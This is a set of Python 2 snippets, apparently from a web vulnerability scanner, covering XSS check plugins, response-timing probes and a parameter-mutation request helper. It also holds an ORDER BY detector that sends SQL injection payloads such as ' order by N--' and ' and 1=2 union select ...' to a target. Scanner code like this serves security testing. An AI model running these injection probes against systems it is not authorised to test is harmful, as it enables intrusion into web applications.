Ejemplo n.º 1
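        def __check_if_rsp_stable_on_orig_input():
            """Probe the unmodified ``url`` twice and report whether its responses are stable.

            Returns True only when both probes answered with status '200', their
            bodies are identical, and the gap between their elapsed times is within
            the tolerance window derived from ``RSP_SHORT_DURATION``; otherwise False.
            The previous version computed this flag into a local and never returned
            it, so the enclosing code could not observe the result.  Reads ``url``,
            ``get_request`` and ``RSP_SHORT_DURATION`` from the enclosing scope.
            """
            first = get_request(url=url, allow_redirects=False)
            # Short pause so the two samples are not back-to-back
            time.sleep(2)
            second = get_request(url=url, allow_redirects=False)

            # A non-200 answer on either probe makes the baseline unusable
            if first.status != '200' or second.status != '200':
                return False

            # Differing bodies mean the page is dynamic; timing deltas would be noise
            if first.data != second.data:
                return False

            min_resp_time = min(first.elapsed, second.elapsed)
            max_resp_time = max(first.elapsed, second.elapsed)
            # Tolerance window: at least RSP_SHORT_DURATION, widened by the slowest probe
            short_duration = max(RSP_SHORT_DURATION, max_resp_time) + 1

            return (max_resp_time - min_resp_time) <= short_duration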
Ejemplo n.º 2
    def run(self, info):
        """Check the GET parameters of ``info`` for a reflected XSS.

        Returns a list holding at most one XSS finding: the first URL parameter
        for which ``self.xss_detect`` reports an injection.  Responses that are
        301/302 redirects without a Location header, or whose content type is a
        JSON / JavaScript / XML / octet-stream type, are skipped and yield an
        empty list.  POST parameters are not handled yet (placeholder print only).
        """
        findings = []

        #TODO 30X redirect
        #TODO Content-Type
        p = get_request(url=info, allow_redirects=False)
        is_redirect = p.status in ('301', '302')
        if is_redirect and not p.headers.get('Location'):
            return findings

        non_html_types = ('(application\/json)|(application\/javascript)|(text\/json)|(text\/javascript)|'
                          '(application\/x-javascript)|(application\/octet-stream)|(text\/xml)|(application\/xml)')
        if p.content_type is not None and re.search(non_html_types, p.content_type) is not None:
            return findings

        if info.has_url_params:
            for k, v in info.url_params.iteritems():
                if not self.xss_detect(info, method='GET', k=to_utf8(k), v=to_utf8(v)):
                    continue

                target = URL(url=info.url,
                             method='GET',
                             post_params=None,
                             referer=info.referer)
                vul = XSS(target,
                          vulnerable_params={"injection": "xxxxxx"},
                          injection_point=XSS.INJECTION_POINT_URL,
                          injection_type="XSS")
                # NOTE(review): looks like a leftover debug marker in the description -- confirm
                vul.description += "f**k"

                findings.append(vul)
                # Only the first vulnerable parameter is reported
                break

        if info.has_post_params:
            print('POST')

        # Send the results
        return findings
Ejemplo n.º 3
    def run(self, info):
        """Scan the URL parameters of ``info`` for reflected XSS.

        Fetches the page once (no redirects).  A 301/302 without a Location
        header, or a JSON / JavaScript / XML / octet-stream content type, ends
        the scan with an empty list.  Otherwise each GET parameter is handed to
        ``self.xss_detect`` and the first positive one produces a single XSS
        finding.  POST parameters only trigger a placeholder print for now.
        """
        m_return = []

        #TODO 30X redirect
        #TODO Content-Type
        p = get_request(url=info, allow_redirects=False)
        if (p.status == '301' or p.status == '302') and not p.headers.get('Location'):
            return m_return

        non_html = re.compile('(application\/json)|(application\/javascript)|(text\/json)|(text\/javascript)|'
                              '(application\/x-javascript)|(application\/octet-stream)|(text\/xml)|(application\/xml)')
        if p.content_type is not None and non_html.search(p.content_type) is not None:
            return m_return

        def make_finding(source):
            # Build the XSS record for the GET request that carried the injection
            target = URL(url=source.url, method='GET', post_params=None, referer=source.referer)
            finding = XSS(target,
                          vulnerable_params={"injection": "xxxxxx"},
                          injection_point=XSS.INJECTION_POINT_URL,
                          injection_type="XSS")
            # NOTE(review): looks like a leftover debug marker -- confirm
            finding.description += "f**k"
            return finding

        if info.has_url_params:
            for k, v in info.url_params.iteritems():
                key, value = to_utf8(k), to_utf8(v)
                if self.xss_detect(info, method='GET', k=key, v=value):
                    m_return.append(make_finding(info))
                    break  # one finding per URL is enough

        if info.has_post_params:
            print('POST')

        # Send the results
        return m_return
Ejemplo n.º 4
 def get_original_time():
     """Return the elapsed time of one non-redirecting request to ``url`` (enclosing scope)."""
     return get_request(url=url, allow_redirects=False).elapsed
Ejemplo n.º 5
    def _orderby_sql_detect(self, **kwargs):
        '''
        Probe one request parameter for an ORDER BY style SQL injection.

        :param kwargs: ``k`` (str, required) -- name of the parameter to mutate;
                       ``v`` -- its current value (read but not used below);
                       ``url`` (URL, required) -- the request to mutate;
                       ``method`` -- HTTP method handed on to payload_muntants.
        :return: True when a mutated response contains ORDER_BY_MD5_VAL, else False.
        :raises ValueError: when ``k`` or ``url`` is missing or of the wrong type.
        '''
        k = kwargs.get("k", None)
        if k is None or not isinstance(k, str):
            raise ValueError("Except param has not key!")

        v = kwargs.get("v", None)  # fetched for completeness; not used in this method

        url = kwargs.get("url", None)
        if url is None or not isinstance(url, URL):
            raise ValueError("Except param has not req_uri")

        method = kwargs.get('method', None)

        # Search window for the column count probed below
        max_bound = 100
        min_bound = -1

        lower_index, high_index = 0, max_bound

        table_column = 0  # stays 0 when no consistent column count is found

        max_order_column_payload = ' order by {0}--'.format( max_bound )
        min_order_column_payload = ' order by {0}--'.format( min_bound )

        # Baseline response of the unmodified request
        p = get_request(url = url, allow_redirects = False)

        # NOTE(review): with 'and' this guard never fires -- a None p already raised on
        # p.status, and a non-200 response is not rejected; 'or' with the None test
        # first looks intended. Confirm before changing.
        if p.status != '200' and p is None:
            return False

        orig_resp_body  = p.data

        max_order_column_payload_rsp = None
        min_order_column_payload_rsp = None
        try:
            # '.data' raises AttributeError when payload_muntants yields None (presumably
            # a skipped or failed request); that is treated as "not injectable"
            max_order_column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':max_order_column_payload, 'type': 0}, bmethod = method).data
            min_order_column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':min_order_column_payload, 'type': 0}, bmethod = method).data
        except AttributeError:
            return False

        # Only when the max_bound payload changes the page while the min_bound payload
        # leaves it equal to the baseline is the column count searched
        if max_order_column_payload_rsp != None and min_order_column_payload_rsp != None and (orig_resp_body != max_order_column_payload_rsp) and (orig_resp_body == min_order_column_payload_rsp):
            #maybe exist sql_inject

            while lower_index <= high_index:
                #bisection
                # NOTE(review): under Python 2 (which this file's syntax targets) '/'
                # on ints already floors, so math.ceil is a no-op here -- confirm
                col = int(math.ceil( (lower_index + high_index) / 2))
                column_payload = ' order by {0}--'.format(col)
                column_payload_rsp = None
                try:
                    column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':column_payload, 'type': 0}, bmethod = method, use_cache = False).data
                except AttributeError:
                    pass

                # A changed body means col is above the real column count
                if column_payload_rsp != None and column_payload_rsp != orig_resp_body:
                    high_index = col
                else:
                    # Window collapsed: the lower edge is the column count
                    if (lower_index + 1) == high_index:
                        table_column = lower_index
                        break
                    elif lower_index == high_index:
                        table_column = high_index
                        break
                    lower_index = col

        if table_column != 0:

            Logger.log_verbose("%s maybe has order by inject!" % url.url)
            # Confirm by placing ORDER_BY_SIGN in each column slot in turn and
            # looking for ORDER_BY_MD5_VAL echoed back in the response
            for inject_index in range(table_column):
                union_list = [x+1 for x in range(table_column)]
                union_list[inject_index] = ORDER_BY_SIGN
                union_payload = ' and 1=2 union select {0}'.format(','.join(map(str,union_list)))
                union_payload_rsp = None
                try:
                    union_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':union_payload, 'type': 0}, bmethod = method, use_cache = False).data
                except AttributeError:
                    pass

                if union_payload_rsp != None and ORDER_BY_MD5_VAL in union_payload_rsp:
                    return True

        return False
Ejemplo n.º 6
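def payload_muntants(url_info, payload=None, bmethod='GET',
                     exclude_cgi_suffix=('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg', 'txt'),
                     use_cache=None, timeout=10.0, bcheck_use_orig_body=True, req_header=None,
                     resp_code='200', resp_header=None, **kwargs):
    '''
    Send one request to ``url_info`` with ``payload`` applied to a single parameter.

    The mutation happens on a copy; ``url_info`` itself is not modified.

    :param url_info: URL object whose GET (``url_params``) or POST (``post_params``) parameters are mutated.
    :param payload: {'k':'id', 'pos': 1, 'payload':str, 'type': 0}  (pos:0 key, pos:1 value) (type:0 append, type:1 replace)
                    Only ``pos`` 1 (value) is implemented; ``pos`` 0 raises ValueError.
    :param bmethod: 'GET' or 'POST' -- selects which parameter set is mutated and how it is sent.
    :param exclude_cgi_suffix: URL extensions treated as static content; such URLs are skipped (returns None).
    :param use_cache: passed through to ``get_request``.
    :param timeout: passed through to ``get_request``.
    :param bcheck_use_orig_body: accepted for compatibility; not used here.
    :param req_header: accepted for compatibility; not used here.
    :param resp_code: accepted for compatibility; not used here.
    :param resp_header: accepted for compatibility; not used here.
    :param kwargs: accepted for compatibility; not used here.
    :return: the ``get_request`` response, or None when the URL is skipped, there are
             no parameters to mutate, or all three attempts raised NetworkException.
    :raises TypeError: when ``url_info`` is not a URL or ``payload`` is not a dict.
    :raises ValueError: when ``bmethod`` is neither 'GET' nor 'POST', or the payload targets a key.
    '''
    # None default instead of a shared mutable {} (same behaviour for callers)
    if payload is None:
        payload = {}

    if not isinstance(url_info, URL):
        raise TypeError("Expected url object, type:%s" % type(url_info))

    if not isinstance(payload, dict):
        raise TypeError("Excepted payload object, type:%s" % type(payload))

    if url_info.parsed_url.extension[1:] in exclude_cgi_suffix:
        Logger.log_verbose("Skipping URL: %s" % url_info.url)
        # Previously the skip was only logged and the request still went out
        return None

    m_url_info = copy(url_info)
    if bmethod == "GET":
        param_dict = copy(m_url_info.url_params)
    elif bmethod == "POST":
        param_dict = copy(m_url_info.post_params)
    else:
        # Previously param_dict was left unbound for any other method
        raise ValueError("Unsupported method: %r" % (bmethod,))

    # Nothing to mutate (None or empty); the old 'len(...) == None' test could never be true
    if not param_dict:
        return None

    parsed = parse_url(m_url_info.url)

    k = payload['k']
    if payload['pos'] != 1:
        # TODO GET/POST param key need deal
        raise ValueError("GET/POST param key payload is not support!")

    if payload['type'] == 0:  # append to the current value
        param_dict[k] = param_dict[k] + payload['payload']
    elif payload['type'] == 1:  # replace the current value
        param_dict[k] = payload['payload']

    # The mutated request is identical on every retry, so build it once
    if bmethod == "GET":
        m_resource_url_payload = URL(url=parsed.request_cgi, method=m_url_info.method,
                                     referer=m_url_info.referer, url_params=param_dict)
    else:
        m_resource_url_payload = URL(url=parsed.request_cgi, method=m_url_info.method,
                                     referer=m_url_info.referer, post_params=param_dict)

    for _attempt in range(3):
        try:
            return get_request(url=m_resource_url_payload, allow_redirects=False,
                               use_cache=use_cache, timeout=timeout)
        except NetworkException as e:
            # Brief back-off before the next attempt
            time.sleep(0.5)
            Logger.log_error_verbose("Error while processing %r: %s" % (m_resource_url_payload.url, str(e)))

    # All retries failed
    return None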
Ejemplo n.º 7
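def payload_muntants(url_info,
                     payload=None,
                     bmethod='GET',
                     exclude_cgi_suffix=(
                         'css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg', 'txt'
                     ),
                     use_cache=None,
                     timeout=10.0,
                     bcheck_use_orig_body=True,
                     req_header=None,
                     resp_code='200',
                     resp_header=None,
                     **kwargs):
    '''
    Issue one request to ``url_info`` with ``payload`` applied to a single parameter.

    Works on a copy of the parameters; ``url_info`` is left untouched.

    :param url_info: URL object whose GET (``url_params``) or POST (``post_params``) parameters are mutated.
    :param payload: {'k':'id', 'pos': 1, 'payload':str, 'type': 0}  (pos:0 key, pos:1 value) (type:0 append, type:1 replace)
                    Only ``pos`` 1 (value) is implemented; ``pos`` 0 raises ValueError.
    :param bmethod: 'GET' or 'POST' -- which parameter set is mutated and how it is sent.
    :param exclude_cgi_suffix: URL extensions treated as static content; such URLs are skipped (returns None).
    :param use_cache: passed through to ``get_request``.
    :param timeout: passed through to ``get_request``.
    :param bcheck_use_orig_body: accepted for compatibility; unused here.
    :param req_header: accepted for compatibility; unused here.
    :param resp_code: accepted for compatibility; unused here.
    :param resp_header: accepted for compatibility; unused here.
    :param kwargs: accepted for compatibility; unused here.
    :return: the ``get_request`` response, or None when the URL is skipped, there are
             no parameters to mutate, or all three attempts raised NetworkException.
    :raises TypeError: when ``url_info`` is not a URL or ``payload`` is not a dict.
    :raises ValueError: when ``bmethod`` is neither 'GET' nor 'POST', or the payload targets a key.
    '''
    if payload is None:  # avoid a shared mutable default
        payload = {}

    if not isinstance(url_info, URL):
        raise TypeError("Expected url object, type:%s" % type(url_info))

    if not isinstance(payload, dict):
        raise TypeError("Excepted payload object, type:%s" % type(payload))

    if url_info.parsed_url.extension[1:] in exclude_cgi_suffix:
        Logger.log_verbose("Skipping URL: %s" % url_info.url)
        # The skip used to be logged but not acted on
        return None

    m_url_info = copy(url_info)
    if bmethod == "GET":
        param_dict = copy(m_url_info.url_params)
    elif bmethod == "POST":
        param_dict = copy(m_url_info.post_params)
    else:
        # Any other method used to leave param_dict unbound
        raise ValueError("Unsupported method: %r" % (bmethod,))

    # None or empty: nothing to mutate ('len(...) == None' could never be true)
    if not param_dict:
        return None

    parsed = parse_url(m_url_info.url)

    k = payload['k']
    if payload['pos'] != 1:
        # TODO GET/POST param key need deal
        raise ValueError("GET/POST param key payload is not support!")

    if payload['type'] == 0:  # append
        param_dict[k] = param_dict[k] + payload['payload']
    elif payload['type'] == 1:  # replace
        param_dict[k] = payload['payload']

    # Same request on every retry, so build it once
    request_kwargs = dict(url=parsed.request_cgi,
                          method=m_url_info.method,
                          referer=m_url_info.referer)
    if bmethod == "GET":
        request_kwargs['url_params'] = param_dict
    else:
        request_kwargs['post_params'] = param_dict
    m_resource_url_payload = URL(**request_kwargs)

    retry_cnt = 0
    while retry_cnt < 3:
        try:
            return get_request(url=m_resource_url_payload,
                               allow_redirects=False,
                               use_cache=use_cache,
                               timeout=timeout)
        except NetworkException as e:
            retry_cnt += 1
            time.sleep(0.5)  # brief back-off before retrying
            Logger.log_error_verbose("Error while processing %r: %s" %
                                     (m_resource_url_payload.url, str(e)))

    # Three attempts failed
    return None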